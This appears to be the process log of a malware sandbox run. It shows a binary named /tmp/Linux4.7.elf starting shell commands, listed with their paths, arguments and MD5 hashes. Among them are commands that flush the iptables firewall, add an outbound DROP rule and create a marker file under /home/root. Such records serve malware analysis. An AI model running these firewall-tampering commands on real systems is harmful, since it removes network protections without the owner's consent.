                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/bin/sh
                                                                                            Arguments:n/a
                                                                                            File size:129816 bytes
                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/usr/bin/whoami
                                                                                            Arguments:whoami
                                                                                            File size:39256 bytes
                                                                                            MD5 hash:dbc1888ae50bb5d4d9a7a210d51be710

                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/tmp/Linux4.7.elf
                                                                                            Arguments:n/a
                                                                                            File size:1315556 bytes
                                                                                            MD5 hash:b6a59da20064367d4a954123c69345dc

                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/bin/sh
                                                                                            Arguments:sh -c "iptables --flush"
                                                                                            File size:129816 bytes
                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/bin/sh
                                                                                            Arguments:n/a
                                                                                            File size:129816 bytes
                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/usr/sbin/iptables
                                                                                            Arguments:iptables --flush
                                                                                            File size:99296 bytes
                                                                                            MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/tmp/Linux4.7.elf
                                                                                            Arguments:n/a
                                                                                            File size:1315556 bytes
                                                                                            MD5 hash:b6a59da20064367d4a954123c69345dc

                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/bin/sh
                                                                                            Arguments:sh -c whoami
                                                                                            File size:129816 bytes
                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/bin/sh
                                                                                            Arguments:n/a
                                                                                            File size:129816 bytes
                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/usr/bin/whoami
                                                                                            Arguments:whoami
                                                                                            File size:39256 bytes
                                                                                            MD5 hash:dbc1888ae50bb5d4d9a7a210d51be710

                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/tmp/Linux4.7.elf
                                                                                            Arguments:n/a
                                                                                            File size:1315556 bytes
                                                                                            MD5 hash:b6a59da20064367d4a954123c69345dc

                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/bin/sh
                                                                                            Arguments:sh -c "touch /home/root/ConfigDatecz"
                                                                                            File size:129816 bytes
                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/bin/sh
                                                                                            Arguments:n/a
                                                                                            File size:129816 bytes
                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/usr/bin/touch
                                                                                            Arguments:touch /home/root/ConfigDatecz
                                                                                            File size:100728 bytes
                                                                                            MD5 hash:3859c173f5d3b37be3e531b7c84a9c68

                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/tmp/Linux4.7.elf
                                                                                            Arguments:n/a
                                                                                            File size:1315556 bytes
                                                                                            MD5 hash:b6a59da20064367d4a954123c69345dc

                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/bin/sh
                                                                                            Arguments:sh -c "iptables -A OUTPUT -p tcp --dport 0 -j DROP"
                                                                                            File size:129816 bytes
                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/bin/sh
                                                                                            Arguments:n/a
                                                                                            File size:129816 bytes
                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/usr/sbin/iptables
                                                                                            Arguments:iptables -A OUTPUT -p tcp --dport 0 -j DROP
                                                                                            File size:99296 bytes
                                                                                            MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/usr/lib/systemd/systemd
                                                                                            Arguments:n/a
                                                                                            File size:1620224 bytes
                                                                                            MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                            Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                            File size:22760 bytes
                                                                                            MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                            Start time:04:37:57
                                                                                            Start date:21/10/2022
                                                                                            Path:/usr/lib/systemd/systemd
                                                                                            Arguments:n/a
                                                                                            File size:1620224 bytes
                                                                                            MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                            Start time:04:37:57
                                                                                            Start date:21/10/2022
                                                                                            Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                            Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                            File size:22760 bytes
                                                                                            MD5 hash:3633b075f40283ec938a2a6a89671b0e